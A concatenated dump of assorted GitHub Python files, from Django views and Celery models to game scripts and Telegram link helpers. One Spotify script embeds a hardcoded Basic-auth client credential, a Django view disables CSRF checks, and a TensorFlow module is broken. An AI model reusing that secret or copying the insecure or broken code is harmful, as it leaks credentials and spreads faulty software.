scalar_grouping_size):\n int_grouping, size = scalar_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture\ndef component_tuple_prop(component_cls, 
tuple_grouping_size):\n int_grouping, size = tuple_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture\ndef component_dict_prop(component_cls, dict_grouping_size):\n int_grouping, size = dict_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture\ndef component_mixed_prop(component_cls, mixed_grouping_size):\n int_grouping, size = mixed_grouping_size\n component, prop_grouping, value = build_component_with_grouping(\n component_cls, int_grouping, size\n )\n return component, prop_grouping, value\n\n\n@pytest.fixture(params=[Input, Output, State])\ndef dependency(request):\n return request.param\n\n\n@pytest.fixture\ndef app():\n return dash.Dash(plugins=[FlexibleCallbacks()])\n\n\nclass ExampleTemplate(BaseTemplate):\n _valid_roles = (\"input\", \"output\", \"custom\")\n\n _inline_css = \"\"\"\n .test-css-class {\n padding: 0px;\n }\\n\"\"\"\n\n @classmethod\n def build_labeled_component(cls, component, label, label_id=None, role=None):\n # Subclass could use bootstrap or ddk\n if not label_id:\n label_id = build_id(\"label\")\n label_component = html.Label(id=label_id, children=label)\n container = html.Div(id=\"container\", children=[label_component, component])\n return container, \"children\", label_component, \"children\"\n\n @classmethod\n def build_containered_component(cls, component, role=None):\n \"\"\"\n Alternative to bulid_labeled_component for use without label, but for\n Unitform spacing with it\n \"\"\"\n container = html.Div(id=\"container\", children=component)\n return container, \"children\"\n\n def _perform_layout(self):\n return html.Div(\n id=\"all-div\",\n children=[\n html.Div(id=\"inputs-div\", children=self.get_containers(\"input\")),\n html.Div(id=\"outputs-div\", children=self.get_containers(\"output\")),\n html.Div(id=\"customs-div\", children=self.get_containers(\"custom\")),\n ],\n )\n\n @classmethod\n def _wrap_full_layout(cls, layout):\n return html.Div(id=\"app-div\", children=[layout])\n\n def _configure_app(self, app):\n super()._configure_app(app)\n add_stylesheet = True\n for url in app.config.external_stylesheets:\n if \"test_stylesheet\" in url:\n add_stylesheet = False\n break\n\n if add_stylesheet:\n app.config.external_stylesheets.append(\"http://test_stylesheet.css\")\n\n\n@pytest.fixture\ndef test_template():\n return ExampleTemplate()\n","repo_name":"patilanup246/dash-labs","sub_path":"tests/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":5667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"28274928943","text":"# Same as finding start point of cycle in a linkedlist. Use fp, sp. They will intersect at one point. Start another pointer at beginning and let it intersect sp.\n\nclass Solution(object):\n def findDuplicate(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n sp, fp = nums[0], nums[0]\n\n sp = nums[sp]\n fp = nums[fp]\n fp = nums[fp]\n \n while sp!=fp:\n sp = nums[sp]\n \n fp = nums[fp]\n fp = nums[fp]\n \n a = nums[0]\n b = sp\n \n while a!=b:\n a = nums[a]\n b = nums[b]\n return a","repo_name":"rohitpatwa/leetcode","sub_path":"287. Find the Duplicate Number.py","file_name":"287. 
Find the Duplicate Number.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28508469463","text":"from django.http import JsonResponse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Company\nimport json\n\n\n# Create your views here.\n\nclass CompanyView(View):\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super().dispatch(request, *args, **kwargs)\n\n def get(self, request, id=0): #Se deja predeterm. en 0 para que las entregue todas en dado caso de que no se especifique un id (y se va al else), pero si le decimos un id específico, entonces entra al if y nos lo filtra.\n if (id>0):\n companies = list(Company.objects.filter(id=id).values())\n if len(companies) > 0: #...si existe ese id que buscamos entonces:\n company = companies[0] # porque aquí ya sabemos del if externo que obtendremos solo una compañía, y esa única estará filtrada en la list en la posición cero.\n datos = {'message': 'Success', 'company': company}\n else:\n datos = {'message': 'Company not found...'}\n return JsonResponse(datos)\n else:\n companies = list(Company.objects.values()) #Aquí serializamos a JSON el tipo QuerySet\n if len(companies) > 0:\n datos = {'message':'Success', 'companies': companies}\n else:\n datos = {'message': 'Companies not found...'}\n return JsonResponse(datos)\n def post(self, request):\n # print(request.body)\n jd = json.loads(request.body)\n # print(jd)\n Company.objects.create(name=jd['name'], website=jd['website'], foundation=jd['foundation'])\n datos={'message':'Success'}\n return JsonResponse(datos)\n def put(self, request, id): #porque necesitaremos el id de la compañía a modificar\n jd = json.loads(request.body)\n companies = list(Company.objects.filter(id=id).values())\n if len(companies) > 0:\n company = Company.objects.get(id=id) #esta vez si tengo la certeza de encontrarlo get devuelve un error si no lo encuentra, filter no devuelve errores.\n company.name=jd['name']\n company.website=jd['website']\n company.foundation=jd['foundation']\n company.save()\n datos={'message':'Success'}\n else:\n datos = {'message': 'Companies not found...'}\n return JsonResponse(datos)\n def delete(self, request, id):\n companies = list(Company.objects.filter(id=id).values())\n if len(companies) > 0:\n Company.objects.filter(id=id).delete()\n datos = {'message': 'Success'}\n else:\n datos = {'message': 'Company not found...'}\n return JsonResponse(datos)","repo_name":"JairoChoconta/django_project_2","sub_path":"Proyecto_API/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43124805038","text":"import os\nimport random\nfrom hangman_art import STAGES, LOGO\nfrom hangman_words import word_list\n\n# Game setup\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\nend_of_game = False\nlives = 6\n\n# Game start\nprint(LOGO)\n\n# Testing code\n#  print(f'Pssst, the solution is {chosen_word}.')\n\n# Create blanks\ndisplay = []\nfor _ in range(word_length):\n display += \"_\"\n\n#  Ongoing game\nwhile not end_of_game:\n guess = input(\"Guess a letter: \").lower()\n\n #  Clear console to give a better UX\n os.system('clear')\n\n #  Check if the guess was already guessed before\n if guess in 
display:\n print(f\"You've already guessed {guess}\")\n else:\n # Guess not guessed before,\n # Update display in case the letter exists\n for position in range(word_length):\n letter = chosen_word[position]\n if letter == guess:\n display[position] = letter\n\n # If the user is wrong, lose a life and check if he lost all lives\n if guess not in chosen_word:\n print(\n f\"You guessed {guess}, that's not in the word. You lose a life.\")\n lives -= 1\n if lives == 0:\n end_of_game = True\n print(\n f\"You lose... the word you wanted to find is {chosen_word}\")\n\n print(f\"{' '.join(display)}\")\n\n # Check if user has got all letters.\n if \"_\" not in display:\n end_of_game = True\n print(\"You win.\")\n\n print(STAGES[lives])\n","repo_name":"Maycas/100-days-Python-2022","sub_path":"Day 07 - The hangman game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5758006973","text":"from datetime import datetime, timedelta\n\nfrom mongoengine import *\nfrom celery import current_app\nimport celery.schedules\n\n\ndef get_periodic_task_collection():\n if hasattr(current_app.conf, \"mongodb_scheduler_collection\"):\n return current_app.conf.get(\"mongodb_scheduler_collection\")\n elif hasattr(current_app.conf, \"CELERY_MONGODB_SCHEDULER_COLLECTION\"):\n return current_app.conf.CELERY_MONGODB_SCHEDULER_COLLECTION\n return \"schedules\"\n\n\n#: Authorized values for PeriodicTask.Interval.period\nPERIODS = ('days', 'hours', 'minutes', 'seconds', 'microseconds')\n\n\nclass PeriodicTask(DynamicDocument):\n \"\"\"MongoDB model that represents a periodic task\"\"\"\n\n meta = {'collection': get_periodic_task_collection(),\n 'allow_inheritance': True}\n\n class Interval(EmbeddedDocument):\n \"\"\"Schedule executing on a regular interval.\n\n Example: execute every 4 days\n every=4, period=\"days\"\n \"\"\"\n every = IntField(min_value=0, default=0, required=True)\n period = StringField(choices=PERIODS)\n\n meta = {'allow_inheritance': True}\n\n @property\n def schedule(self):\n return celery.schedules.schedule(timedelta(**{self.period: self.every}))\n\n @property\n def period_singular(self):\n return self.period[:-1]\n\n def __unicode__(self):\n if self.every == 1:\n return 'every {0.period_singular}'.format(self)\n return 'every {0.every} {0.period}'.format(self)\n\n class Crontab(EmbeddedDocument):\n \"\"\"Crontab-like schedule.\n\n Example: Run every hour at 0 minutes for days of month 10-15\n minute=\"0\", hour=\"*\", day_of_week=\"*\", day_of_month=\"10-15\", month_of_year=\"*\"\n \"\"\"\n minute = StringField(default='*', required=True)\n hour = StringField(default='*', required=True)\n day_of_week = StringField(default='*', required=True)\n day_of_month = StringField(default='*', required=True)\n month_of_year = StringField(default='*', required=True)\n\n meta = {'allow_inheritance': True}\n\n @property\n def schedule(self):\n return celery.schedules.crontab(minute=self.minute,\n hour=self.hour,\n day_of_week=self.day_of_week,\n day_of_month=self.day_of_month,\n month_of_year=self.month_of_year)\n\n def __unicode__(self):\n rfield = lambda f: f and str(f).replace(' ', '') or '*'\n return '{0} {1} {2} {3} {4} (m/h/d/dM/MY)'.format(\n rfield(self.minute), rfield(self.hour), rfield(self.day_of_week),\n rfield(self.day_of_month), rfield(self.month_of_year),\n )\n\n name = StringField(unique=True)\n task = StringField(required=True)\n\n interval = 
EmbeddedDocumentField(Interval)\n crontab = EmbeddedDocumentField(Crontab)\n\n args = ListField()\n kwargs = DictField()\n\n queue = StringField()\n exchange = StringField()\n routing_key = StringField()\n soft_time_limit = IntField()\n\n expires = DateTimeField()\n start_after = DateTimeField()\n enabled = BooleanField(default=True)\n\n last_run_at = DateTimeField()\n\n total_run_count = IntField(min_value=0, default=0)\n max_run_count = IntField(min_value=0, default=0)\n\n date_changed = DateTimeField()\n date_creation = DateTimeField()\n description = StringField()\n\n run_immediately = BooleanField()\n no_changes = False\n\n def save(self, force_insert=False, validate=True, clean=True,\n write_concern=None, cascade=None, cascade_kwargs=None,\n _refs=None, save_condition=None, signal_kwargs=None, **kwargs):\n if not self.date_creation:\n self.date_creation = datetime.now()\n self.date_changed = datetime.now()\n super(PeriodicTask, self).save(force_insert, validate, clean,\n write_concern, cascade, cascade_kwargs, _refs,\n save_condition, signal_kwargs, **kwargs)\n\n def clean(self):\n \"\"\"validation by mongoengine to ensure that you only have\n an interval or crontab schedule, but not both simultaneously\"\"\"\n if self.interval and self.crontab:\n msg = 'Cannot define both interval and crontab schedule.'\n raise ValidationError(msg)\n if not (self.interval or self.crontab):\n msg = 'Must defined either interval or crontab schedule.'\n raise ValidationError(msg)\n\n @property\n def schedule(self):\n if self.interval:\n return self.interval.schedule\n elif self.crontab:\n return self.crontab.schedule\n else:\n raise Exception(\"must define interval or crontab schedule\")\n\n def __unicode__(self):\n fmt = '{0.name}: {{no schedule}}'\n if self.interval:\n fmt = '{0.name}: {0.interval}'\n elif self.crontab:\n fmt = '{0.name}: {0.crontab}'\n else:\n raise Exception(\"must define interval or crontab schedule\")\n return fmt.format(self)\n","repo_name":"zmap/celerybeat-mongo","sub_path":"celerybeatmongo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5186,"program_lang":"python","lang":"en","doc_type":"code","stars":120,"dataset":"github-code","pt":"16"} +{"seq_id":"45227820141","text":"from django.urls import path\nfrom .views import *\nurlpatterns = [\n path('', index,name='home'),\n path('resume/', resume,name='resume'),\n path('about/', about,name='about'),\n path('blog/', blog,name='blog'),\n path('blog/', show_blog,name='blog_name'),\n path('contacts/', contacts,name='contacts')\n]\n","repo_name":"capzzet/infress","sub_path":"resume/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29831868664","text":"from src import messenger\nfrom unittest.mock import patch, ANY, MagicMock\nimport json\n\n@patch(\"stock.Stock\")\ndef test_connect(mock_stock):\n obj = messenger.Messenger()\n\n with patch.object(obj, 'mqttConnection') as mock_connect:\n obj.connect()\n mock_connect.connect.assert_called_with(\"localhost\",1883,60)\n\n@patch(\"stock.Stock\")\ndef test_disconnect(mock_stock):\n obj = messenger.Messenger()\n\n with patch.object(obj, 'connected', True), patch.object(obj, 'mqttConnection') as mock_connect:\n obj.disconnect()\n mock_connect.disconnect.assert_called()\n\n@patch(\"stock.Stock\")\ndef test_foreverLoop(mock_stock):\n obj = messenger.Messenger()\n\n with patch.object(obj, 'mqttConnection') as mock_connect:\n 
obj.foreverLoop()\n mock_connect.loop_forever.assert_called()\n\n@patch(\"stock.Stock\")\ndef test_onMQTTconnect(mock_stock):\n obj = messenger.Messenger()\n\n mock_client = MagicMock()\n\n obj._Messenger__onMQTTconnect(mock_client,None,None,None)\n\n mock_client.subscribe.assert_called_with([('req/price', 0)])\n\n\n@patch(\"stock.Stock\")\ndef test_onMQTTMessage(mock_stock):\n obj = messenger.Messenger()\n\n obj._Messenger__onMQTTMessage(MagicMock(),None,None)\n\nclass DummyMSG:\n def __init__(self):\n self.payload = \"Test\"\n\n def set_payload(self,data):\n self.payload = str.encode(data)\n\n@patch(\"stock.Stock\")\ndef test_mailMQTTRideTimecallback(mock_stock):\n obj = messenger.Messenger()\n\n responseData = DummyMSG()\n\n msgData = {\n \"symbol\":\"aapl\"\n }\n\n responseData.set_payload(json.dumps(msgData))\n\n with patch.object(obj, 'stockService') as mockStock, patch.object(obj,'mqttConnection') as mockConnection:\n mockStock.getStockPrice.return_value = {'symbol':'aapl','current':0.0,'highestDay':0.0,'lowestDay':0.0,'timestamp':0}\n obj._Messenger__mailMQTTPricecallback(None,None,responseData)\n mockStock.getStockPrice.assert_called_with(\"aapl\")\n mockConnection.publish.assert_called_with(\"price/current\",json.dumps({'symbol':'aapl','current':0.0,'highestDay':0.0,'lowestDay':0.0,'timestamp':0}))","repo_name":"pda-aswe/servicepreis","sub_path":"tests/test_messenger.py","file_name":"test_messenger.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43045608651","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nAplicações Distribuídas - Projeto 4 - spotify.py\nGrupo: 13\nNúmeros de aluno: 51595 - Diogo Frazão,\n 51628 - Tiago Robalo,\n 51636 - Vasco Bento\n\"\"\"\n#Zona para fazer imports\n\nimport requests\nimport json\nimport os\nimport ast\n\nget_at = 'curl -X \"POST\" -H \"Authorization: Basic OWRmNzQzY2E5ZDNkNDc1NmEyNTQwMWI4Y2EzYjMwMjc6NDNmNjQ3ZTA5ZmZjNDg3NzgwZjBiZDVhMGNmOThkN2I=\" -d grant_type=client_credentials https://accounts.spotify.com/api/token'\naccess_token = ast.literal_eval(os.popen(get_at).read())\n\n#Programa principal\n\ndef show_banda(banda):\n url = \"https://api.spotify.com/v1/search?q=\" + str(banda) + \"&type=artist&market=us&limit=1\"\n try:\n r = json.loads(requests.get(url, access_token).content.decode('utf-8'))\n name = r['artists']['items'][0]['name']\n genre = r['artists']['items'][0]['genres']\n followers = r['artists']['items'][0]['followers']['total']\n popularity = r['artists']['items'][0]['popularity']\n return [name, genre, followers, popularity]\n except:\n return [\"Token Inválido\"]\n\n\ndef show_album(album):\n url = \"https://api.spotify.com/v1/search?q=\" + str(album) + \"&type=album&market=us&limit=1\"\n try:\n r = json.loads(requests.get(url, access_token).content.decode('utf-8'))\n name = r['albums']['items'][0]['name']\n year = r['albums']['items'][0]['release_date'].split('-')[0]\n artist = r['albums']['items'][0]['artists'][0]['name']\n tracks = r['albums']['items'][0]['total_tracks']\n return [name, year, artist, tracks]\n except:\n return [\"Token Inválido\"]\n","repo_name":"tiagoffmr/ADII","sub_path":"server/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69803604807","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nimport numpy as np\nimport tensorflow as 
tf\n\nfrom base import Model\nfrom utils import progress\nfrom sentenceEncorder import sentenceEncorder\n\nclass sentenceExtractor(Model):\n def __init__(self, sess, word_vocab_size, decoder_inputs, batch_size=20,\n rnn_size=650, layer_depth=1, word_embed_dim=150,\n feature_maps=[10, 20, 30, 60, 60, 60, 60], kernels=[1,2,3,4,5,6,7],\n max_grad_norm=5, dropout_prob=0.5):\n\n self.dropout_prob = dropout_prob\n self.data_dir = \"data\"\n self.dataset_name = \"mitei\"\n self.checkpoint_dir = \"checkpoint\"\n self.batch_size = batch_size\n self.seq_length = 60 # length of sequence\n self.decoder_inputs = decoder_inputs\n\n # RNN\n self.sess = sess\n self.rnn_size = rnn_size\n self.layer_depth = layer_depth\n self.num_decoder_symbols = 2\n\n # CNN\n self.word_vocab_size = word_vocab_size\n self.word_embed_dim = word_embed_dim\n self.feature_maps = feature_maps\n self.kernels = kernels\n\n # data_loading\n # self.loader = BatchLoader()\n\n def prepare_model(self):\n with tf.variable_scope(\"sentenceExtractor\"):\n self.word_inputs = tf.placeholder(tf.int32, [self.batch_size, self.seq_length])\n self.decoder_inputs = []\n\n with tf.variable_scope(\"embedding\") as scope:\n embedding_W = tf.get_variable(\"word_embedding\", [self.word_vocab_size, self.word_embed_dim])\n self.embedded_word = tf.nn.embedding_lookup(W, self.word_inputs)\n # word2vec?\n\n self.cnn_outputs = []\n\n with tf.variable_scope(\"sentenceEncorder\") as scope:\n word_indices = tf.split(1, self.seq_length, tf.expand_dims(self.word_inputs, -1))\n for idx in xrange(self.seq_length):\n word_index = tf.reshape(word_indices[idx], [-1, 1])\n if idx != 0:\n scope.reuse_variables()\n\n word_cnn = sentenceEncorder(self.embedded_word, self.word_embed_dim, self.feature_maps, self.kernels)\n cnn_output = word_cnn.output\n self.cnn_outputs.append(cnn_output)\n\n #######################################################################\n #bn = batch_norm()\n #norm_output = bn(tf.expand_dims(tf.expand_dims(cnn_output, 1), 1))\n #cnn_output = tf.squeeze(norm_output)\n #self.cnn_outputs.append(cnn_output)\n #######################################################################\n\n # ... 
#\n with tf.variable_scope(\"LSTM\") as scope:\n self.cell = tf.nn.rnn_cell.BasicLSTMCell(self.rnn_size)\n self.stacked_cell = tf.nn.rnn_cell.MultiRNNCell([self.cell] * self.layer_depth)\n outputs, _ = tf.nn.seq2seq.embedding_attention_seq2seq(self.cnn_outputs,\n self.decoder_inputs,\n self.cell,\n vocabulary_size,\n self.num_decoder_symbols,\n 300, # size of cnn_output\n feed_previous=feed_previous)\n\n self.lstm_outputs = []\n self.true_outputs = tf.placeholder(tf.int64,[self.batch_size, self.seq_length])\n true_outputs = tf.split(1, self.seq_length, self.true_outputs)\n\n loss = 0\n\n for idx, (top_h, true_output) in enumerate(zip(outputs, true_outputs)):\n top_h = tf.nn.dropout(top_h, self.dropout_prob)\n self.lstm_outputs.append(top_h)\n loss += tf.nn.sparse_softmax_cross_entropy_with_logits(self.lstm_outputs[idx], tf.squeeze(true_output))\n\n self.loss = tf.reduce_mean(loss) / self.seq_length\n tf.scalar_summary(\"loss\", self.loss)\n\ndef train(self, epoch):\n cost = 0\n target = np.zeros([self.batch_size, self.seq_length])\n N = self.loader.sizes[0]\n for idx in xrange(N):\n target.fill(0)\n x, y, x_char = self.loader.next_batch(0)\n for b in xrange(self.batch_size):\n for t, w in enumerate(y[b]):\n target[b][t] = w\n\n feed_dict = {\n self.word_inputs: x,\n self.char_inputs: x_char,\n self.true_outputs: target,\n }\n\n _, loss, step, summary_str = self.sess.run(\n [self.optim, self.loss, self.global_step, self.merged_summary], feed_dict=feed_dict)\n\n self.writer.add_summary(summary_str, step)\n\n if idx % 50 == 0:\n progress(idx/N, \"epoch: [%2d] [%4d/%4d] loss: %2.6f\" % (epoch, idx, N, loss))\n\n cost += loss\n\n return cost / N\n","repo_name":"danhper/deepsentence","sub_path":"deep_sentence/summarizer/models/extractive/sentenceExtractor.py","file_name":"sentenceExtractor.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"44133181124","text":"import pandas as pd\r\nfrom Case import system_input\r\n\r\n\r\n# Defines a function that returns the minimum quantity of power that can be exchanged between an offer bus and a request bus, without leading to congestions\r\n\r\ndef PTDF_check(SetPoint, Quantity, offer_bus, request_bus):\r\n k = 0\r\n m = 0\r\n epsilon = 0.00001 # Tolerance\r\n\r\n data = system_input(SetPoint)\r\n nodes = data['nodes'] # index for nodes\r\n lines = data['lines'] # index for lines\r\n lines_cstr = data['lines_cstr'] # index for constrained lines\r\n\r\n PTDF = pd.read_csv('PTDF.csv', names=nodes) # Retrieve PTDFs from a csv file, name columns after the nodes\r\n PTDF['Line'] = lines # Name rows after the lines\r\n PTDF.set_index('Line', inplace=True) # Change the index to be the line names\r\n\r\n # Initial state\r\n Pl_flow = [] # List for the line flows\r\n Pl_max_pos = [] # List for the maximum variation of the line flows in the same direction\r\n Pl_max_neg = [] # List for the maximum variation of the line flows in the other direction\r\n\r\n for l in lines_cstr: # Calculate power flow in each line\r\n Pl = 0\r\n for i in nodes:\r\n Pl += PTDF.loc[l, i] * (data[i]['SetPoint']) # Calculate the power flow in the line by adding the contribution of each bus\r\n if abs(Pl) > (data[l]['lineCapacity'] + epsilon): # Make sure that the initial power flows are feasible\r\n print('The initial dispatch is not feasible ({})'.format(l))\r\n Pl_max_pos.append(data[l]['lineCapacity'] - Pl) # Calculate the maximum variation of the power flow in the same direction for 
this line\r\n Pl_max_neg.append(-data[l]['lineCapacity'] - Pl) # Calculate the maximum variation of the power flow with a change of direction for this line\r\n Pl_flow.append(Pl)\r\n\r\n # Define the proper buses depending on the direction of the bids\r\n\r\n k = nodes[offer_bus]\r\n m = nodes[request_bus]\r\n\r\n # Update the quantity to make sure that the line flows are all feasible\r\n for l in lines_cstr:\r\n x = lines_cstr.index(l)\r\n\r\n PTDF_diff = - (PTDF.loc[l, k] - PTDF.loc[l, m])\r\n # First calculate the maximum power flow change in the line Pl_max\r\n if PTDF_diff > epsilon: # If the power is flowing in the same direction\r\n Pl_max = max(Pl_max_pos[x], 0)\r\n elif PTDF_diff < -epsilon: # If the power is flowing in the other direction\r\n Pl_max = min(Pl_max_neg[x], 0)\r\n # Then update the quantity\r\n if PTDF_diff > epsilon or PTDF_diff < -epsilon: # The difference between the two PTDFs is not equal to zero\r\n if Pl_max / PTDF_diff < Quantity: # If the quantity is bigger than the max for this line, update it to be equal to the max for this line\r\n Quantity = Pl_max / PTDF_diff\r\n Quantity = round(Quantity, 3)\r\n if Quantity == 0:\r\n return Quantity, 1 #returns 1 if is possible to tranfer energy\r\n else:\r\n return Quantity, 0 #returns 0 if it's not possible to tranfer energy\r\n\r\n\r\n\r\n","repo_name":"steliosiv/Continuous-Energy-Market-for-flexibility-using-renewable-energy","sub_path":"code/PTDF.py","file_name":"PTDF.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15588811030","text":"from tkinter import *\nfrom tkinter import filedialog\nimport os\n\n\n# my function to load file\ndef callback():\n root.filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\",\n filetypes=((\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n v.set(str(root.filename))\n\n\n# initialize my window\nroot = Tk()\nglobal v\nroot.title(\"Dimo\")\nroot.minsize(490, 500)\nroot.geometry(\"490x500\")\n\n# top frame\ntopFrame = Frame(root)\ntopFrame.pack()\n\n# bottom frame\nbottomFrame = Frame(root)\nbottomFrame.pack(side=BOTTOM)\n\nv = StringVar()\n\n\n\n# my widgets\nwelcome = Label(topFrame, text=\"Welcome to IDS\")\nb1 = Button(topFrame, text=\"Load File\", command=callback)\nb2 = Button(bottomFrame, text=\"Start\")\nfileName = Label(topFrame, textvariable=v)\nfiledir = Label(root, text=\"File Directory\")\nimg = PhotoImage(file=\"12.gif\")\npanel = Label(topFrame, image=img)\npanel.pack(side=\"top\", fill=\"both\", expand=\"yes\")\n\nwelcome.pack()\nb1.pack()\nb2.pack()\nfileName.pack()\n\n\nroot.mainloop()\n","repo_name":"MostafaSlaam/Dimo_GP","sub_path":"v.py","file_name":"v.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30297919330","text":"from typing import Optional, Any, Iterable\nfrom urllib.parse import urlencode\n\nfrom telebox.utils.not_set import NOT_SET\n\n\ndef get_username_link(username: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username\n }\n )\n else:\n return f\"t.me/{username}\"\n\n\ndef get_phone_number_link(number: str, *, with_tg: bool = False) -> str:\n number = number.lstrip(\"+\")\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"phone\": number\n }\n )\n else:\n return 
f\"t.me/+{number}\"\n\n\ndef get_chat_invite_link(hash_: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://join\",\n parameters={\n \"invite\": hash_\n }\n )\n else:\n return f\"t.me/+{hash_}\"\n\n\ndef get_message_public_link(username: str, message_id: int, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"post\": message_id\n }\n )\n else:\n return f\"t.me/{username}/{message_id}\"\n\n\ndef get_message_private_link(chat_id: int, message_id: int, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://privatepost\",\n parameters={\n \"channel\": chat_id,\n \"post\": message_id\n }\n )\n else:\n return f\"t.me/c/{chat_id}/{message_id}\"\n\n\ndef get_share_link(url: str, text: Optional[str] = None, *, with_tg: bool = False) -> str:\n return _get_parametrized_link(\n \"tg://msg_url\" if with_tg else \"t.me/share\",\n parameters={\n \"url\": url,\n \"text\": text\n }\n )\n\n\ndef get_video_chat_link(\n username: str,\n invite_hash: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n video_chat_value = NOT_SET if invite_hash is None else invite_hash\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"videochat\": video_chat_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"videochat\": video_chat_value\n }\n )\n\n\ndef get_livestream_link(\n username: str,\n invite_hash: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n livestream_value = NOT_SET if invite_hash is None else invite_hash\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"livestream\": livestream_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"livestream\": livestream_value\n }\n )\n\n\ndef get_voice_chat_link(\n username: str,\n invite_hash: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n voice_chat_value = NOT_SET if invite_hash is None else invite_hash\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"voicechat\": voice_chat_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"voicechat\": voice_chat_value\n }\n )\n\n\ndef get_add_stickers_link(name: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://addstickers\",\n parameters={\n \"set\": name\n }\n )\n else:\n return f\"t.me/addstickers/{name}\"\n\n\ndef get_add_emoji_link(name: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://addemoji\",\n parameters={\n \"set\": name\n }\n )\n else:\n return f\"t.me/addemoji/{name}\"\n\n\ndef get_mtproxy_link(host: str, port: int, secret: str, *, with_tg: bool = False) -> str:\n return _get_parametrized_link(\n \"tg://proxy\" if with_tg else \"t.me/proxy\",\n parameters={\n \"server\": host,\n \"port\": port,\n \"secret\": secret\n }\n )\n\n\ndef get_socks5_proxy_link(\n host: str,\n port: int,\n username: Optional[str] = None,\n password: Optional[str] = None,\n *,\n with_tg: bool = False\n) -> str:\n return _get_parametrized_link(\n \"tg://socks\" if with_tg else \"t.me/socks\",\n parameters={\n \"server\": host,\n \"port\": port,\n \"user\": username,\n \"pass\": password\n }\n )\n\n\ndef get_add_theme_link(name: 
str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://addtheme\",\n parameters={\n \"slug\": name\n }\n )\n else:\n return f\"t.me/addtheme/{name}\"\n\n\ndef get_bot_link(username: str, payload: str, *, with_tg: bool = False) -> str:\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"start\": payload\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"start\": payload\n }\n )\n\n\ndef get_group_bot_link(\n username: str,\n payload: Optional[str] = None,\n admin_rights: Optional[Iterable[str]] = None,\n *,\n with_tg: bool = False\n) -> str:\n payload_value = NOT_SET if payload is None else payload\n admin_value = \"+\".join(admin_rights) if admin_rights is not None else None\n\n if with_tg:\n return _get_parametrized_link(\n \"tg://resolve\",\n parameters={\n \"domain\": username,\n \"startgroup\": payload_value,\n \"admin\": admin_value\n }\n )\n else:\n return _get_parametrized_link(\n f\"t.me/{username}\",\n parameters={\n \"startgroup\": payload_value,\n \"admin\": admin_value\n }\n )\n\n\ndef get_channel_bot_link(\n username: str,\n admin_rights: Iterable[str],\n *,\n with_tg: bool = False\n) -> 